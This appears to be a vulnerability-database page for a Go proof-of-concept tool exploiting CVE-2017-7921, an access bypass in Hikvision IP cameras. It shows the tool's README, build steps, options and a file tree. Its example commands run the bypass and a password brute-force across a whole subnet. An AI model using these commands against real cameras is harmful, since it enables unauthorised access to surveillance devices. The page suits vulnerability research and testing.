CVE-2017-7921 PoC — 多款Hikvision产品安全漏洞

Source

Associated Vulnerability

Description

Hikvision IP camera access bypass exploit, developed by golang. 

Readme

# Hikvision bypass exploit

## Requirements
1. github.com/levigross/grequests
2. github.com/msterzhang/gpool
3. golang.org/x/net
4. github.com/go-vgo/robotgo

## Build
```
git clone https://github.com/MisakaMikato/cve-2017-7921-golang.git
cd cve-2017-7921-golang/src/cve-2017-7921-golang
go build .
```

## Usage
```
cve-2017-7921 [-e] [-b] [--password password] [-t target] [--thread thread] [-timeout time]

Options:
  -b    Use burte force model
  -e    Use cve-2017-7921 exploit model
  -o string
        Set the output path, if it's empty, the result will be outputed to stdout.
  -password string
        Set the password if using burte force model, or password file path with syntax 'file:<path>' (default "12345")
  -t string
        Exploited target, ip:port or file path, example: 127.0.0.1, or target file path with syntax 'file:<path>'
  -thread int
        The number of concurrent threads (default 1)
  -timeout int
        Give up on target after this long. (default 5)

Press 'w' to get progress info :)
```
Example
```
cve-2017-7921 -e -t 192.168.1.0/24 --thread 10 -o ./res.txt
cve-2017-7921 -b --password file:./pwds.txt -t 192.168.1.0/24 --thread 10
```

File Snapshot

 [4.0K]  /data/pocs/7350e4dc3098d5fd9fc4510bc7af54c8655931ee
├── [ 299]  go.mod
├── [6.2K]  go.sum
├── [1.0K]  LICENSE
├── [1.1K]  README.md
└── [4.0K]  src
    ├── [4.0K]  aesebc
    │   ├── [1.8K]  aesebc.go
    │   └── [2.2K]  aesebc_test.go
    ├── [4.0K]  cve-2017-7921-golang
    │   ├── [7.2K]  main.go
    │   ├── [5.6K]  main_test.go
    │   └── [2.3K]  output.go
    └── [4.0K]  gip
        ├── [2.2K]  gip.go
        └── [ 769]  gip_test.go

4 directories, 11 files

Remarks